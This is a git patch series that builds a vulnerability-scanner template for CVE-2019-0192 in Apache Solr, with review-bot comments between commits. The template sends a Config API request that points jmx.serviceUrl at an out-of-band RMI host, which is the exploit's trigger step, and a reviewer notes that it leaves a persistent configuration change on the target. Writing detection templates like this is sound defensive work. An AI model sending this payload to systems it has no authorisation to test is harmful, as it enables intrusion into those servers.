From f105c4b1a0b48d8ef9fd224ed00b812f50136667 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 23:55:53 +0700 Subject: [PATCH 1/8] Create CVE-2019-0192.yaml /claim #10891 --- http/cves/2019/CVE-2019-0192.yaml | 49 +++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2019/CVE-2019-0192.yaml diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml new file mode 100644 index 0000000000..bbf7a0d0d8 --- /dev/null +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-0192 + +info: + name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + author: hnd3884 + severity: Critical + description: | + This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + reference: + - https://github.com/Imanfeng/Apache-Solr-RCE + +http: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 + + extractors: + - type: json + name: core_name + json: + - '.status | .[].name' + internal: true + + - raw: + - | + POST /solr/{{core_name}}/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 123 + + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + - type: word + part: body + words: + - "javax.management.remote.rmi" + extractors: + - type: regex + part: body + regex: + - "rmi://.+?:1097/obj" From 75a36a3c17830efe6861b1f793cf65efc452258f Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 17:05:58 +0000 Subject: [PATCH 2/8] update --- http/cves/2019/CVE-2019-0192.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) 
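Review bot: The second raw request's `set-property` body changes `jmx.serviceUrl` on the target core, so a positive hit leaves a configuration change behind (the Config API persists such overrides, as far as I know of Solr), and neither the description nor the matchers acknowledge that side effect. I would add to the description: `Note: this template modifies the target core's jmx.serviceUrl through the Config API; the override persists until an operator reverts it.`, and the `tags:` line introduced in the later "updated template" commit is the place to add `intrusive` so operators can exclude the template from routine runs. Separately, the `.status | .[].name` extractor yields one name per loaded core, and which value `{{core_name}}` takes in the POST when several are returned is not visible here; confirm the engine's behaviour or restrict the second request to a single core.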
diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index bbf7a0d0d8..c550dbd251 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -42,8 +42,12 @@ http: part: body words: - "javax.management.remote.rmi" + - type: status + # Some status codes we want to match + status: + - 500 extractors: - type: regex part: body regex: - - "rmi://.+?:1097/obj" + - "rmi://.+?:1097/obj" \ No newline at end of file From 3e73553f5900200fc0baafa3f780d3ca8be57a13 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 17:11:47 +0000 Subject: [PATCH 3/8] trailing space --- http/cves/2019/CVE-2019-0192.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index c550dbd251..50313fcb34 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -1,11 +1,10 @@ id: CVE-2019-0192 info: - name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr author: hnd3884 severity: Critical - description: | - This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI reference: - https://github.com/Imanfeng/Apache-Solr-RCE @@ -40,10 +39,9 @@ http: - "dns" - type: word part: body - words: + words: - "javax.management.remote.rmi" - type: status - # Some status codes we want to match status: - 500 extractors: From a41966b0699ad8825551dab0caefa033fae2beae Mon Sep 17 00:00:00 2001 
From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 18:32:38 +0000 Subject: [PATCH 4/8] update lint --- http/cves/2019/CVE-2019-0192.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 50313fcb34..51b44bdd11 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -4,7 +4,7 @@ info: name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr author: hnd3884 severity: Critical - description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI reference: - https://github.com/Imanfeng/Apache-Solr-RCE @@ -45,7 +45,7 @@ http: status: - 500 extractors: - - type: regex - part: body - regex: - - "rmi://.+?:1097/obj" \ No newline at end of file + - type: regex + part: body + regex: + - "rmi://.+?:1097/obj" \ No newline at end of file From a89c5f92ec3942b1f4d9d89383205bc3e6cc2245 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 18:36:32 +0000 Subject: [PATCH 5/8] update lint --- http/cves/2019/CVE-2019-0192.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 51b44bdd11..023716157f 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -14,7 +14,6 @@ http: GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 - extractors: - type: json name: core_name 
@@ -28,9 +27,8 @@ http: Host: {{Hostname}} Content-Type: application/json Content-Length: 123 - + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} - matchers-condition: and matchers: - type: word From 1bc896134f95c5f4c972b3b00e4dde5c6c8a87e1 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 19:13:51 +0000 Subject: [PATCH 6/8] trailing space --- http/cves/2019/CVE-2019-0192.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 023716157f..b3a38e6ef6 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -27,7 +27,7 @@ http: Host: {{Hostname}} Content-Type: application/json Content-Length: 123 - + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} matchers-condition: and matchers: From cc31e2c750d3ab01d8597ab83708e6a2bcf615d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 4 Nov 2024 01:16:23 +0530 Subject: [PATCH 7/8] updated template --- http/cves/2019/CVE-2019-0192.yaml | 38 ++++++++++++++++++++++--------- 1 file changed, 27 insertions(+), 11 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index b3a38e6ef6..ec61359961 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml 
@@ -1,19 +1,38 @@ id: CVE-2019-0192 info: - name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + name: Apache Solr - Deserialization of Untrusted Data author: hnd3884 - severity: Critical - description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + severity: critical + description: | + In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. reference: - https://github.com/Imanfeng/Apache-Solr-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2019-0192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0192 + cwe-id: CWE-502 + epss-score: 0.94754 + epss-percentile: 0.99337 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: solr + shodan-query: title:"Solr" + fofa-query: title="Solr + tags: cve,cve2019,apache,solr,deserialization,rce,oast + +flow: http(1) && http(2) http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 + extractors: - type: json name: core_name 
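Review bot: `fofa-query: title="Solr` in the new metadata block is missing its closing quote, so the value is the literal text `title="Solr` and the query will not run as intended on that platform; the sibling `shodan-query: title:"Solr"` shows the intended form, and the line should read `fofa-query: title="Solr"`. The rest of the classification block (CVSS vector 9.8, CWE-502) is consistent with the lowered-case `severity: critical`.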
@@ -26,24 +45,21 @@ http: POST /solr/{{core_name}}/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 123 - {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} + {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" + - type: word part: body words: - "javax.management.remote.rmi" + - type: status status: - 500 - extractors: - - type: regex - part: body - regex: - - "rmi://.+?:1097/obj" \ No newline at end of file From b05a784d7ec1a880628e56b268b17d611c7a933c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Nov 2024 12:37:54 +0530 Subject: [PATCH 8/8] added dsl matchers --- http/cves/2019/CVE-2019-0192.yaml | 21 +++++++-------------- 1 file changed, 7 insertions(+), 14 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index ec61359961..6fe747343c 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -48,18 +48,11 @@ http: {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}} - matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - "javax.management.remote.rmi" - - - type: status - status: - - 500 + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(body, "javax.management.remote.rmi")' + - 'contains(content_type, "text/plain")' + - 'status_code == 500' + condition: and
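Review bot: The new `'contains(content_type, "text/plain")'` clause is ANDed with the other three, so if the error response from the affected 5.x/6.x Config API carries a different Content-Type the whole match silently fails closed; nothing on the page shows the response's content type, so this should be confirmed against both branches or the clause dropped, since the OAST DNS interaction together with `javax.management.remote.rmi` in the body already pins the behaviour. Dropping `matchers-condition: and` is fine now that a single dsl matcher remains, but a one-line comment above `- type: dsl` would help the next maintainer, e.g. `# Expect a 500 whose body names the RMI classes after the Config API applies the injected serviceUrl — confirm against 5.x/6.x`.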